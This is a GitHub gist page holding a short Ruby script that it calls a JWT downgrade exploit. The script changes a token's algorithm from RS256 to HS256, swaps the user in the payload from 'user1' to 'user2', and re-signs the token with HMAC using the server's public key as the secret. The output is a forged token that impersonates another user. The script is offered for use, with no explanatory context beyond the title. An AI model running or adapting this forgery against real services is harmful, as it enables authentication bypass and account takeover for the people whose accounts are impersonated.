Created
September 1, 2019 20:18
-
-
Save Lopseg/a1bd08e9f4984437202a2c4435c56cf3 to your computer and use it in GitHub Desktop.
jwt ruby exploits that can be used to exploit JWT downgrade vulnerabilities. RS256 to HS256
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| require 'base64' | |
| require 'openssl' | |
| pub = File.open("public.pem").read | |
| TOKEN = "XXX" | |
| header, payload, signature = TOKEN.split('.') | |
| decoded_header = Base64.decode64(header) | |
| decoded_header.gsub!("RS256", "HS256") | |
| puts decoded_header | |
| new_header = Base64.strict_encode64(decoded_header).gsub("=","") | |
| decoded_payload = Base64.decode64(payload) | |
| decoded_payload.gsub!("user1","user2") | |
| puts decoded_payload | |
| new_payload = Base64.strict_encode64(decoded_payload).gsub("=","") | |
| data = new_header+"."+new_payload | |
| signature = Base64.urlsafe_encode64(OpenSSL::HMAC.digest(OpenSSL::Digest.new("sha256"), pub, data)) | |
| puts data+"."+signature | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment